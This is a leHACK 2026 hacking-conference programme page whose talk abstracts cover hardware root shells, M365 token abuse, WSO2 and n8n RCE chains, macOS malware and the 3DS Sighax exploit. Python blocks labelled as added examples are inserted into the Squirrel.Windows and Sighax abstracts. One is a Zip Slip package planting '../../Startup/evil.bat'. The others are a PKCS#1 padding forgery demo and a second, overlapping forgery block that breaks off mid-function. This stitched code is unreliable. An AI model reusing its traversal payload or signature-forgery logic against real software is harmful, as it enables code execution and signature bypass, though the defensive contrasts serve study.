Keep digging for that root shell
Still wondering how to gain root access to a device via hardware? Why not try it yourself? Again? This workshop will equip you with the skills and knowledge to understand the basics of hardware hacking. In this workshop, you may:
- Learn what UART is and why it's a crucial interface for embedded systems.
- Set up your environment: get your tools ready, including serial adapters and terminal software.
- Discover how to physically connect to a device's UART pins and establish a serial connection.
- Learn how to interact with the device's shell and gain root access.
leHACK 2026
Brave New World edition
leHACK is back... The 2026 edition will take place
from Friday 26/06 to Saturday 27/06/2026 (and all night long!)
The call for proposals is closed. We are finalising the list of candidates. The speaker selection will be announced very soon.
leSHOP: leHACK - 2026 - Le Brave New World
26 June 2026 - 28 June 2026
CONFERENCE TRACKS

Conference talks are published as they are selected by the committee. This work is in progress; the schedule is not final.
What is leHACK?

leHACK is the largest and oldest event on the French hacking scene.
leHACK 2026 partners

leHACK is a non-profit event. If you would like to associate your brand with the event and actively contribute to making it possible, download our sponsor pack.
leHACK TRACKS (work in progress)
Workshops track
Your favorite Android mobile apps or smart TV are probably fortresses: obfuscated code, anti-hooking defenses, encrypted protocols. Traditional RE tools? Weeks of manual grinding. But what if you could teach your hooks to evolve, fuzz vendor services for hidden root commands, and let an AI orchestrate the entire RE workflow? In this hands-on workshop, you'll learn to autopsy mobile applications using Reversense, a free collaborative reverse engineering platform now available as open source. Unlike traditional tools that require weeks of manual analysis, Reversense automates the discovery, modeling, and instrumentation of mobile apps in their real execution context. You'll work through 3 real-world scenarios:
- Hardened App Security Audit: identify sensitive data and bypass security mechanisms, such as anti-hooking, using self-improving hooks and dynamic modeling.
- Discovery of Undocumented ADB Commands: use a combination of the built-in fuzzing engine and cross-app hooking to uncover hidden vendor backdoors and factory test modes in Android devices.
- AI-Powered Reverse Automation: leverage MCP (Model Context Protocol) integration to orchestrate complex multi-stage reverse engineering workflows.
Georges-Bastien MICHEL (@FrenchYeti)
Understand the fundamentals of reverse engineering Android applications. Learn to use debugging tools to analyze Android app behavior. Bypass security mechanisms using Frida scripts. Sniff and replay Bluetooth Low Energy (BLE) communications. Modify Smali code to alter app functionality. Reverse engineer native libraries used in Android apps. Perform Man-in-the-Middle (MITM) attacks on HTTPS services.
MadSquirrel Benoît Forgette
Most reverse engineering workflows treat a binary as a static artifact. Dynamic Binary Instrumentation flips that: instead of reading code, you *watch it run*, intercepting every instruction and memory access with nothing but Python. This workshop is a hands-on introduction to DBI using PyQBDI. Attendees go from zero to writing instrumentation scripts that trace execution, inspect runtime state, instrument native libraries, and ultimately bypass anti-debugging protections to extract a hidden flag. They leave with reusable scripts and the foundations to apply QBDI in professional engagements, CTF challenges, or personal research. QBDI is an open-source framework developed at Quarkslab, supporting Linux, Windows, Android, and macOS. It has been used in practice to break whitebox cryptographic implementations, deobfuscate VM-protected binaries, and analyze Android native libraries without source code.
Victor Houal / Laurent Laubin
This workshop introduces a framework dedicated to wireless protocol attacks, WHAD, with a particular focus on the Bluetooth Low Energy protocol. It echoes the talk submitted by the author on the same subject and will put the attacks discussed there into practice on real connected devices.
Virtualabs
The world of Web Hacking is evolving, and with it, our tooling must evolve as well. Caido, the new guy on the HTTP Proxy block, brings a new set of tools and capabilities to web hackers that minimize friction and increase efficiency in your hacking process. Join us as we explore:
* HTTPQL Search
* Caido Workflows (easy to understand & integrate low-code/no-code automation)
* Environment Variables (no, not that kind)
* Organization/Note Taking
* Shift - Caido AI Integration
* and much more
Emile Fugulin
Christopher Guay
Conferences track
26/06/2026
The Microsoft Entra ID and Microsoft 365 ecosystem has become, in 2025-2026, the epicentre of enterprise cloud compromises. The reports are unanimous: identity is the primary attack vector, and M365 environments are the most coveted attack surface, from state-sponsored APTs to Phishing-as-a-Service operators. The talk will cover the most recent and impactful techniques, including FOCI (Family of Client IDs) abuse, extraction of OAuth tokens from Windows caches (TokenBroker, WAM, Azure CLI), bypassing MFA and Conditional Access policies, and detection blind spots. As a common thread, a live demonstration of OAuthBandit v2, an open-source post-exploitation tool specialised in extracting, validating and exploiting Microsoft OAuth tokens from compromised endpoints, with the public release of new advanced features. This presentation is raw field feedback. Based on concrete incident response cases and offensive engagements on compromised M365 tenants, it dissects the modern kill chains observed in production: from initial access via OAuth phishing to full tenant takeover, by way of cloud-to-cloud lateral movement and invisible persistence... as well as other surprises. The objective: to arm defenders with a fine-grained understanding of modern TTPs on M365/Entra ID and with concrete detection and response strategies.
Kondah Hamza
Hamza Kondah is a senior cybersecurity engineer, independent consultant and founder of Hexadream Academy. A Microsoft MVP in Enterprise Security for more than 13 years, he works daily on incident response, offensive audit and hardening engagements in Entra ID, Azure and Microsoft 365 environments. A recognised trainer with more than 13 years in the market, he has trained thousands of professionals on the security of Microsoft ecosystems.
Windows shortcut (.LNK) files remain a persistent threat vector. While simple bypasses like adding spaces exist, this session reveals undocumented techniques for deceptive payload delivery and execution. We’ll explore why these methods work, the black-box research methodology used to find them, and the defensive implications. We are also introducing an open-source tool for security teams to simulate and defend against these advanced LNK-based attacks.
Wietze Beukema
Wietze has been hacking around with computers for years. Originally from the Netherlands, he currently works as a Lead Threat Detection & Response Engineer in London. As a cyber security enthusiast and threat researcher, he has presented his findings on topics including attacker emulation, PowerShell obfuscation, command-line obfuscation and DLL Hijacking at a variety of security conferences. By sharing his research, publishing related tools and his involvement in the open-source projects such as LOLBAS, HijackLibs and ArgFuscator, he aims to give back to the community he learnt so much from.
SAP is widely used by Fortune 500 companies and often underpins critical business processes, yet its attack surface is difficult to evaluate due to its proprietary nature. In this talk, I retrace how I approached that problem in practice: starting from a single thread and following it through reverse engineering, archive format internals, black-box fuzzing, and exploit development. Along the way, I show how that process led to multiple vulnerabilities across different SAP components, ranging from local privilege escalation to remote unauthenticated memory corruption. I also cover the practical role LLMs played during the research, as a tool for crash triage, root-cause analysis, and exploit development.
Tao Sauvage
Tao Sauvage is Director of Research at Anvil Secure, specializing in vulnerability research, reverse engineering, and offensive security. He has conducted research across mobile, embedded, and industrial systems, leading to multiple CVEs affecting vendors including Google, Garmin, SAP, Okta, ASUS, Antaira, and Linksys.
Whilst organisations and individuals continue to heavily focus on digital initial access vectors, many continue to overlook physical access. OVERCAST PANDA’s operatives, however, do not discriminate against the physical realm to achieve their targeting objectives.
Jake and Antoine will walk you through real-world intrusions where Chinese state operatives target high-value individuals visiting China and deploy backdoors directly onto their corporate devices. Turning a simple business trip into a full corporate compromise.
Because sometimes the only zero-day you need is a hotel housekeeping schedule.
Jake Lomas
Jake is an Intrusion Analyst in CrowdStrike’s Threat Hunting service, Falcon OverWatch. His work focuses on hunting and disrupting nation state adversarial operations in customer networks. He also previously worked in CrowdStrike’s MDR service, Falcon Complete, where he responded to, contained and remediated a broad range of cyber intrusions.
Antoine Vianey-Liaud
Antoine leads a team of threat hunters at CrowdStrike, finding creative ways to uncover and disrupt sophisticated intrusions on a daily basis.
April 2026: Anthropic unveils Claude Mythos, capable of finding 0-days in every major OS, and restricts its access to 40 hand-picked organisations. Do you really need a classified frontier model to do serious offensive research in 2026?
This talk argues the opposite. DARPA AIxCC proved it in 2025: systems beat models. And in 2026, open models (Gemma 4, Qwen 3.6) reach orchestration scores worthy of frontier models, on accessible hardware. Recent papers validate specialised workflows for harness synthesis, triage, protocol analysis and reverse engineering.
On the agenda: what Mythos really changes, the building blocks available today, and concrete cases of offensive research without a frontier model.
Patrick Ventuzelo
CEO & Founder of FuzzingLabs (Paris, ~28 people). We’re an offensive cybersecurity company specialized in firmware, binaries, and embedded systems.
WSO2 products (API Manager, Identity Server) are massively deployed across critical infrastructure (banking, insurance, defense, government) in France and worldwide. During offensive security engagements at Ambionics Security (LEXFO), we discovered over a dozen critical 0-day vulnerabilities in WSO2's shared Java codebase and achieved RCE on dozens of client instances across French organizations. The vulnerabilities span the full spectrum: authentication bypasses via path parameter confusion, full-control SSRF through a 2008-era legacy proxy, systemic CSRF on every SOAP administration service, account takeover via flawed password reset logic, and multiple RCE vectors through Siddhi Streaming SQL, H2 database UDFs, SQLite file-write to JSP webshell, and unsandboxed JavaScript execution in the JVM. But the real challenge came next. Facing a properly hardened deployment (management console firewalled off, no admin ports exposed, zero outbound connectivity), we chained 7 N-days into a single-request unauthenticated RCE through the only reachable endpoint: the API Gateway HTTPS port. The chain combines blind XXE, SSRF relay, HTTP request smuggling via CRLF injection in Axis2 headers, and privilege escalation into a reliable exploit against near-current WSO2 versions. Packed with Java web exploitation tricks, the talk concludes with a live demo: one request, seven vulnerabilities, a reverse shell.
Noel MACCARY
Pentester at Ambionics Security (LEXFO), specializing in web vulnerability research and exploitation on widely deployed enterprise software. Discovered and responsibly disclosed multiple critical 0-day vulnerabilities in WSO2 products (6+ CVEs), resulting in patches across the WSO2 ecosystem.
Espressif designs small, low-cost system-on-chips primarily intended for wireless connectivity such as Wi-Fi and Bluetooth Low Energy. These SoCs are widely used as the networking and control component in IoT and embedded products, handling external inputs, protocol parsing, and communication with the rest of the system. Espressif has publicly reported cumulative shipments on the order of one billion chips, with hundreds of millions of devices deployed in the field, making vulnerabilities in shared firmware components a product-scale security concern rather than an isolated implementation detail. In this talk, we present a set of real security vulnerabilities identified in Espressif’s software development kit (SDK) and USB stack. Rather than focusing on vulnerability counts, we explain how we deliberately filtered out noise to concentrate on issues that are reachable, cross trust boundaries, and have realistic security impact in shipped products. We briefly introduce the analysis approach that enabled this triage, including graph-based code exploration, backward slicing from security-sensitive operations, reachability and exploitability reasoning, and threat-model awareness. We then deep-dive into a USB vulnerability, walking through the vulnerable code path, violated assumptions, and attacker-controlled inputs. Where available, we present ongoing exploitation work and discuss the practical challenges and constraints of turning such bugs into reliable exploits on embedded targets. Finally, we connect these findings to real-world Espressif-based products, illustrating how low-level firmware vulnerabilities can propagate to product-level security risks. We conclude with lessons learned for embedded developers and security engineers on how to reason about exploitability, prioritization, and impact in modern IoT and embedded software stacks.
Maxime
Maxime Rossi Bellom is a security expert and co-founder of SecMate (https://secmate.dev), a company focused on uncovering security issues from embedded software. He specializes in the hardware and low-level software security of mobile devices and embedded systems, and has extensive experience uncovering real-world vulnerabilities in widely deployed firmware. He enjoys working on secure boot mechanisms and security chips embedded in smartphones.
Ramtine
Ramtine Tofighi Shirazi is a computer scientist and co-founder of SecMate (https://secmate.dev), a company focused on uncovering security issues in embedded software. He specializes in static analysis and automated vulnerability detection, with a focus on bridging the gap between security research and engineering workflows in regulated industries. His work has been published at JLAMP, SPRO, and SSPREW. He holds a PhD in Computer Science.
Is reversing IDA, R2, Frida, Ghidra, QEMU and many others? No: it is all of that, and all of that is not the secret we want to uncover or the DRM we want to break; it is only the means. Today, after Dexcalibur and more than 5 years of development, we are releasing Reversense as open source: a reverse engineering automation platform that creates a projection of your mobile application or binary into a universal representation that can be queried, analysed and executed. Reversense offers a graphical interface for navigating and analysing the application's projection, statically or across executions, along with many features outside the scope of traditional tools: automated UI traversal, automatic generation and editing of Frida hooks that mutate from one execution to the next, cross-process or cross-device instrumentation, in-app fuzzing, phone farm management, and more. The talk presents the tool, the idea and its usage, but above all how we rethought the reverser's craft in an era where binaries are everywhere and the time available for reversing keeps shrinking, while we still want to keep it fun.
Georges-Bastien Michel (@FrenchYeti)
Georges-Bastien MICHEL – aka @FrenchYeti – is a security researcher, speaker (NorthSec, SSTIC, insomni’hack, …), trainer and OSS developer with a strong experience in de-obfuscation, Android security, and TEE vulnerability assessment. He created Dexcalibur and Interruptor (Frida-based userland syscall tracer), among a long list of OSS projects, and contributed to Frida, R2, APKiD and Ghidra projects. He has been vulnerability researcher and reverse engineer in several companies including Thales Lab and UL. Since 2020, he has dedicated his time to building Reversense, a mobile reverse engineering platform – which he is releasing as open source. (Github: https://github.com/FrenchYeti)
What if the backdoor phase required no code at all? Last year at leHack, I introduced a framework for reasoning about unconventional persistence — backdoors built from configuration and trust rather than malware. The audience asked for more demos, more operational reality. This talk delivers. Through live demonstrations on realistic environments, we show how subtle, codeless modifications to a system can create invisible conditions for future code execution — triggered later through channels no defender would think to suspect. No binary, no shell, no payload on disk. Just changes that look benign, pass audits, and wait patiently. Built from tested tradecraft, real red team operations, and ongoing research.
m101
Modified drone companion apps claiming to unlock FCC transmission modes are widely circulated among hobbyist communities, yet their internal mechanisms remain largely undocumented. This talk presents a reverse engineering case study of such a patched Android application, revealing how runtime instrumentation frameworks—specifically Frida—are embedded and abused to dynamically alter application behavior. Through differential APK analysis, deobfuscation of injected JavaScript Frida payloads, and inspection of native libraries, we uncover a full instrumentation pipeline designed to hook critical Java class methods to bypass regulatory constraints. The session concludes with a discussion on technical limitations, potential firmware-level barriers, and implications for mobile app integrity.
Klcium
Pentester working high on the stack by day and exploring low-level systems by night.
27/06/2026
Fifteen years ago, compromising an organization could be as simple as walking through the front door with confidence, dropping a USB drive in a parking lot, or sending a poorly crafted phishing email. At NDH2K11, Jayson E. Street demonstrated just how easily organizations could be compromised using little more than human trust and a bit of creativity. Fast-forward fifteen years. The technology landscape has transformed: AI-generated voices can impersonate executives, phishing campaigns are automated at scale, and attackers now leverage OSINT and generative technologies that dramatically lower the barrier to entry. Yet despite this technological evolution, one uncomfortable truth remains: the fundamental weakness, attackers exploiting humans, has not changed. In this retrospective talk, Jayson revisits real examples from his early work compromising banks and organizations through social engineering and physical infiltration, comparing them to modern attacks involving phishing, vishing, and AI-driven deception. Through stories, demonstrations, and lessons learned across more than a decade of adversarial testing, he shows how attackers continue to succeed not because of cutting-edge exploits, but because organizations still rely on the same fragile assumptions about trust, process, and human behavior. The session concludes by challenging the industry's traditional approach to security validation and introduces a modern framework for adversarial simulation designed to help organizations experience real-world attacks safely before criminals deliver them for real. After fifteen years of evolving tools, tactics, and technology, the biggest lesson may be the simplest one: attack methods change. Human nature does not.
Jayson E. Street
Squirrel.Windows is one of the most widely used auto-update frameworks on Windows. It is used by Discord, Slack, GitHub Desktop and many Electron applications with millions of users. In this talk, I present the results of a complete security audit of the Squirrel.Windows update pipeline, which revealed 8 vulnerabilities affecting several layers of the update system. This research shows that several security mechanisms expected in a modern auto-update system are absent or defective: no signature on the update manifest, circular package integrity verification, no Authenticode verification, Zip Slip vulnerabilities allowing arbitrary file writes, XML parsing vulnerable to XXE attacks, and unsafe handling of temporary directories. By combining these flaws, an attacker able to intercept update traffic can fully compromise the update process and achieve remote code execution when an update is installed. The talk will include several practical demonstrations showing:
- injection of a malicious update manifest in a MITM scenario
- exploitation of a forged .nupkg package to escape the application directory
- the impact of other vulnerabilities such as XXE or the broken delta verification
We will close with an analysis of the design errors observed in this kind of framework and recommendations for building secure update systems.
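As an added Python illustration of the Zip Slip flaw listed above (example code, not Squirrel.Windows' own extractor and not its fix), the block below builds a .nupkg-style zip in memory containing one benign entry and one traversal entry, then runs it through a naive extractor that trusts entry names and a hardened one that resolves every entry against the destination and refuses anything that lands outside it. The entry names, sandbox layout and helper names are assumptions made for the demo.

```python
"""Added example: Zip Slip in a .nupkg-style archive, naive vs hardened extraction.
Not Squirrel.Windows code; the package and paths are constructed for the demo."""
import io
import tempfile
import zipfile
from pathlib import Path


def build_malicious_nupkg() -> bytes:
    """Constructed sample package: one benign entry plus one entry whose name
    uses '..' components to escape the destination directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("lib/net45/app.dll", b"MZ...")
        zf.writestr("../../Startup/evil.bat", b"calc.exe\r\n")
    return buf.getvalue()


def extract_naive(package: bytes, dest: Path) -> list:
    """Vulnerable extractor: joins each entry name onto dest and writes it.
    The OS honours the '..' components, so an entry can land anywhere the
    updater can write."""
    written = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            target = dest / info.filename
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target.resolve())
    return written


def safe_target(dest: Path, name: str) -> Path:
    """Resolve an entry name under dest; raise ValueError if it would escape.
    Backslashes are treated as separators so Windows-style traversal is caught
    on any host; absolute names and drive letters are rejected outright."""
    name = name.replace("\\", "/")
    if name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        raise ValueError(f"absolute entry name rejected: {name!r}")
    root = dest.resolve()
    target = (root / name).resolve()
    if root not in target.parents:
        raise ValueError(f"entry escapes destination: {name!r}")
    return target


def extract_hardened(package: bytes, dest: Path) -> tuple:
    """Hardened extractor: every entry passes through safe_target first.
    Returns (written paths, rejected entry names)."""
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            try:
                target = safe_target(dest, info.filename)
            except ValueError:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(target)
    return written, rejected


def demo() -> dict:
    """Run both extractors inside a throwaway sandbox and report what escaped."""
    pkg = build_malicious_nupkg()
    with tempfile.TemporaryDirectory() as tmp:
        sandbox_root = Path(tmp).resolve()
        app = Path(tmp) / "sandbox" / "apps" / "myapp"
        app.mkdir(parents=True)
        naive_dest = app / "naive"
        naive = extract_naive(pkg, naive_dest)
        escaped = [p for p in naive if naive_dest.resolve() not in p.parents]
        hardened_written, rejected = extract_hardened(pkg, app / "hardened")
        return {
            "naive_escaped": [p.relative_to(sandbox_root).as_posix() for p in escaped],
            "hardened_written": len(hardened_written),
            "hardened_rejected": rejected,
        }


if __name__ == "__main__":
    print(demo())
```

The hardened check resolves both the destination and the candidate path before comparing them, so symlinked temp directories and mixed separators cannot make the comparison lie; rejecting the entry rather than stripping its `..` components keeps a tampered package from silently installing a subset of itself.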
Lucas Torres (Rooting)
n8n is an open-source workflow automation platform with AI agents, used by thousands of organizations worldwide. With more than 70,000 publicly accessible instances on Shodan and recent critical CVEs listed in CISA's Known Exploited Vulnerabilities catalog, it has become a high-value target for attackers. This talk first explores what attackers can do with leaked n8n credentials. Starting from real-world n8n JWT tokens exposed on GitHub, we found around 1,300 publicly reachable instances. Among those, 25% authenticated successfully, giving us a live dataset of production n8n instances to answer one question: what can an attacker do once inside? We built three attack chains to find out. First, we demonstrate Remote Code Execution leveraging real-world workflow abuse and existing CVEs, showing how n8n's legitimate execution capabilities turn into a direct shell. Second, we walk through credential enumeration, extraction, and exfiltration: n8n instances store third-party API keys, OAuth tokens, and database credentials directly in workflows, making a single JWT a skeleton key to an organization's entire integration stack. Third, we reveal original cryptographic weaknesses in n8n's native secret handling, what we call n8ive crypto, exposing design flaws that allow offline secret recovery and privilege escalation. Beyond the practical attacks, this talk raises a broader question: when automation platforms become the central hub of modern infrastructure, an account compromise is now a launchpad for attacks across the entire stack.
Guillaume Valadon
Guillaume is a Cybersecurity Researcher at GitGuardian. He holds a PhD in networking. He likes looking at data and crafting packets. He co-maintains Scapy. And he still remembers what AT+MS=V34 means!
Often underestimated by organisations, physical intrusion is nevertheless a particularly effective compromise vector, despite growing investment in technical and human controls. This talk offers a concrete analysis of the mechanisms that lead to the success or failure of a physical intrusion, drawing on lessons learned, real cases and red team engagements. We will examine the key success factors, such as social engineering, organisational weaknesses or overestimation of technical controls, as well as the factors leading to failure: staff vigilance, appropriate procedures, security culture, and certain limitations imposed by clients. The aim is to move beyond a purely technological view in order to highlight the central role of people and processes.
Joker2a
Nicolas Aunay, aka Joker2a, is a French pentester specialising in physical intrusion and offensive security. He takes part in cybersecurity conferences and workshops such as BSidesLuxembourg or leHACK in Paris, and shares his knowledge with the InfoSec community.
Come and discover the day-to-day of field engagements in document fraud, somewhere between a pentest and a red team!
Working in anti-fraud since 2016, Cyber Moustache walks the fraudster's path to understand it better and to propose remediation to the companies that hire him, under contract, to defraud them!
Cybermoustache
macOS has long been perceived as a low-risk platform, often treated as a secondary concern compared to Windows and Linux. That assumption no longer holds. As MacBooks become increasingly common in corporate environments, adversaries have followed, turning macOS into a viable and attractive target for real-world attacks. This talk presents a practical, research-driven analysis of the recent evolution of macOS malware. Through hands-on experiments and real techniques, it explores how modern threats achieve execution, fileless operation, persistence, and evasion by abusing native macOS components. As organizations continue to expand their macOS footprint, security strategies often lag behind. Many defensive teams remain heavily focused on Windows and Linux, leaving macOS environments under-monitored, under-tested, and misunderstood. In this talk, I will share my journey researching and developing macOS malware from an adversarial perspective. The session focuses on how attackers leverage legitimate macOS mechanisms to achieve:
- Initial execution and in-memory (fileless) techniques
- Persistence through native system components
- Evasion of endpoint security and detection tools
Each technique is demonstrated using real experiments, with analysis of macOS internals and the behavior of commonly deployed security solutions. Rather than theoretical concepts, the talk emphasizes how these attacks work in practice, and why many defenses fail to stop them. The presentation also addresses a persistent myth, especially common in the Brazilian security community, that macOS is inherently safer or "immune" to malware. By examining real attack paths and defensive gaps, the session highlights the urgent need for improved detection strategies, visibility, and threat modeling on macOS.
Attendees will learn:
- How modern malware abuses internal macOS mechanisms
- Real-world persistence techniques observed in active threats
- How security tools react, or fail, when faced with these attacks
- Practical mitigation strategies to reduce exposure and improve detection
This talk is intended for defenders, red teamers, malware researchers, and anyone interested in understanding how adversaries are actively adapting to the macOS ecosystem.
Zoziel Freire
I have a degree in Information Systems and a postgraduate degree in Forensic Computing, and Cyber Security. With over 16 years of experience in the information technology sector, I have had the opportunity to provide services to several companies across various segments in Brazil and other countries. Throughout my career, I have gained solid experience in Incident Response, Forensic Analysis, Threat Hunting, Penetration Testing, Malware Analysis, Reverse Engineering, and Development. I have also worked on Ransomware incidents, both in Brazil and in other countries. I have actively contributed to the information security community, participating in Brazilian events. Sometimes I spend time bypassing EDR and AntiVirus, and testing operating system gaps. I am passionate about music, especially guitar and piano, and I am a fan of Chaves and Chapolin.
This talk aims to review and explain the Sighax exploit in technical detail. The Nintendo 3DS, despite having layered security based on a strong chain of trust and a privilege split between two processors, ARM11 and ARM9, implements improper validation of the RSA PKCS#1 v1.5 padding in the ARM9 bootrom code. This vulnerability, combined with a custom, incautious ASN.1 parser, makes it possible to bruteforce specific RSA signatures that cause the signature's hash to be computed against itself on the stack, allowing a signature check to be bypassed. We will also discuss how this exploit, coupled with the design of Nintendo's FIRM file format, allows dumping the protected bottom half of the ARM9 bootrom, which is locked away by the time any firmware is loaded. The goal is to provide a clear overview of how a console can go from executing confined userland homebrew to cold-boot, pre-firmware persistence with full access over the console in just a few mistakes. We will go over the 3DS security architecture with its ARM9/ARM11 split, the FIRM boot chain, the RSA PKCS#1 v1.5 padding implementation flaw, the ASN.1 parser mistakes, and how "perfect" signatures were bruteforced to take advantage of these issues in order to sign any firmware stored in the console's eMMC.
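The padding-validation flaw described in this abstract belongs to a well-known class: a verifier that parses the decoded signature block and trusts what it finds, instead of comparing the block against the one it expects. The added Python example below (not the 3DS bootrom code, and not a reproduction of the Sighax technique itself, whose specifics are the talk's subject) contrasts a strict EMSA-PKCS1-v1_5 check with a lax one that walks the padding, believes the DigestInfo's own length fields and never looks at what follows. It operates directly on the encoded message EM, i.e. the bytes the RSA public operation would produce, so no key is needed; the function names, the sample message and the forged layout are assumptions.

```python
"""Added example: strict vs lax PKCS#1 v1.5 signature padding check on EM.
Not the 3DS bootrom code; the sample inputs are constructed for the demo."""
import hashlib
import hmac

# DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")


def build_em(message: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 || DigestInfo(SHA-256(message)), k bytes long."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(message).digest()
    ps_len = k - len(t) - 3
    if ps_len < 8:
        raise ValueError("modulus too short for this digest")
    return b"\x00\x01" + b"\xff" * ps_len + b"\x00" + t


def verify_strict(em: bytes, message: bytes, k: int) -> bool:
    """Correct check (RFC 8017, 8.2.2): rebuild the expected EM and compare it whole.
    Any deviation in padding length, DigestInfo encoding or trailing bytes fails."""
    if len(em) != k:
        return False
    return hmac.compare_digest(em, build_em(message, k))


def verify_lax(em: bytes, message: bytes) -> bool:
    """Flawed check: skip the padding, then trust the DigestInfo's own length
    fields and compare only the digest.  The padding-string length is never
    checked against k - len(T) - 3 and nothing after the DigestInfo is examined,
    so the attacker controls the tail of EM."""
    try:
        if em[:2] != b"\x00\x01":
            return False
        i = 2
        while em[i] == 0xFF:
            i += 1
        if em[i] != 0x00:
            return False
        i += 1
        # Minimal DER walk: SEQUENCE { SEQUENCE { OID, NULL }, OCTET STRING digest }
        if em[i] != 0x30:
            return False
        seq = em[i + 2 : i + 2 + em[i + 1]]
        if seq[0] != 0x30:
            return False
        hash_tlv = seq[2 + seq[1] :]
        if hash_tlv[0] != 0x04:
            return False
        digest = hash_tlv[2 : 2 + hash_tlv[1]]
    except IndexError:
        return False
    return hmac.compare_digest(digest, hashlib.sha256(message).digest())


def forge_em(message: bytes, k: int, tail_len: int) -> bytes:
    """Attacker-shaped EM (constructed, not a real signature): shortened padding,
    a genuine DigestInfo for `message`, then `tail_len` attacker-chosen bytes.
    The lax verifier accepts it; the strict one does not."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(message).digest()
    ps_len = k - len(t) - 3 - tail_len
    if ps_len < 8:
        raise ValueError("tail too long for this modulus size")
    return b"\x00\x01" + b"\xff" * ps_len + b"\x00" + t + b"\x41" * tail_len


if __name__ == "__main__":
    k = 256  # 2048-bit modulus
    good = build_em(b"FIRM", k)
    forged = forge_em(b"FIRM", k, 64)
    print("strict/good:", verify_strict(good, b"FIRM", k))
    print("lax/forged:", verify_lax(forged, b"FIRM"))
    print("strict/forged:", verify_strict(forged, b"FIRM", k))
```

In a real attack the work lies in finding a signature whose RSA public operation yields an EM of the accepted shape, which is where the bruteforce effort the abstract mentions goes; the point of the example is that a verifier comparing the full EM byte for byte leaves no such shape to search for.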
Cyprien Molinet (@cypelf)
I began cybersecurity and development in high school for fun, wondering how computers worked. I grew up with Nintendo consoles and I was always curious about how they work internally. I remember hacking my Wii back in 2016, following tutorials on the internet, not understanding what I was doing. It felt like magic, and I found it amazing how people were able to do that. That's how I first entered cybersecurity. I joined a French 3DS hacking community and started making online video tutorials about how to do it myself, for the French audience. As I continued to grow up, I graduated from an engineering school. I worked as an apprentice at the Ministry of the Interior for one year, then at Synacktiv for 3 years, where I spent two years doing pentests and one year doing security product development. I'm now working as educational lead for development and cybersecurity at Ecole 2600 for the cybersecurity specialised bachelor. During these last few years, I also contributed to the cybersecurity scene through contributions and activity in the Root-Me association, mainly between 2021 and 2024. I spent time creating reverse engineering challenges, including one on a Nintendo Switch homebrew. Among the few talks that I gave for the Root-Me organised CTF celebrating the 10k members on the Discord server, I gave one specifically on the Fusée Gelée vulnerability found in the Nintendo Switch bootrom USB protocol handling, allowing arbitrary code execution at the highest level of privilege, just like Sighax here for the Nintendo 3DS. At the same time, I also took part in many CTFs between 2021 and 2024, and in 2023 I qualified at the French CyberSecurity Challenge (FCSC) for the official French CTF team going to the European Cybersecurity Challenge (ECSC). I qualified on my scores in the general scoreboard, in the reverse category, and in the hardware category.
From my experience transmitting my knowledge at School 2600, you can be guaranteed the talk will be clear to follow and rich in content! I can also certify my content will be 100% technical, hand made stuff and 0% AI slop. Important point nowadays, after all!
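The padding flaw this abstract describes belongs to a well-known bug class: a PKCS#1 v1.5 verifier that walks the decoded block with a hand-written ASN.1 parser instead of rebuilding the expected block and comparing every byte. The Python below is an added example written for this page; it is neither the talk's material nor Nintendo's bootrom code, and it does not reproduce the Sighax stack trick or the signature brute-force against the 3DS key. It shows the classic consequence of the same class of mistake, as published by Bleichenbacher in 2006: against a lenient verifier and a public exponent of 3, anyone can forge a signature by taking a cube root, with no private key. The toy key (2048-bit, e=3, seeded RNG), the sample message and all function names are constructed for the example.

```python
"""Strict vs lenient RSA PKCS#1 v1.5 signature verification (added toy example)."""
import hashlib
import hmac
import random

_rng = random.Random(20260626)  # deterministic toy key material, not a real key
_SMALL_PRIMES = [p for p in range(3, 1000, 2) if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # RFC 8017 9.2 note 1

def _is_probable_prime(n, rounds=16):
    """Trial division by small primes, then Miller-Rabin."""
    for p in _SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def make_toy_key(bits=2048, e=3):
    """Toy RSA key (n, e, d) with a small public exponent; p-1 and q-1 coprime to e."""
    def gen_prime(b):
        while True:
            p = _rng.getrandbits(b) | (1 << (b - 1)) | 1
            if (p - 1) % e and _is_probable_prime(p):
                return p
    p, q = gen_prime(bits // 2), gen_prime(bits // 2)
    return p * q, e, pow(e, -1, (p - 1) * (q - 1))

def emsa_pkcs1_v15(msg, k):
    """Reference block: 00 01 FF..FF 00 || DigestInfo(SHA-256(msg)), exactly k bytes."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def sign(msg, n, d):
    k = (n.bit_length() + 7) // 8
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, k), "big"), d, n).to_bytes(k, "big")

def _decode(sig, n, e):
    """s^e mod n as a k-byte block, or None if the signature is out of range."""
    k, s = (n.bit_length() + 7) // 8, int.from_bytes(sig, "big")
    return None if len(sig) != k or s >= n else pow(s, e, n).to_bytes(k, "big")

def verify_strict(msg, sig, n, e):
    """RFC 8017 style: rebuild the whole expected block and compare every byte."""
    em = _decode(sig, n, e)
    return em is not None and hmac.compare_digest(em, emsa_pkcs1_v15(msg, len(em)))

def verify_lenient(msg, sig, n, e):
    """The bug class: skip padding, trust the ASN.1 length bytes, ignore what follows."""
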